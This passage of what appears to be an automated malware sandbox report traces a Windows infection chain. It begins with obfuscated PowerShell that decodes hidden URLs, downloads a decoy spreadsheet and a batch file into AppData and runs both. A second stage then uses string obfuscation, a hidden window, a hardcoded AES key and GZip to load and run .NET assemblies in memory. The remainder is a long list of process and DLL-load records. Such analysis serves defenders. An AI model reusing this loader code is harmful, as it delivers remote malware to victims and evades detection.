$ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
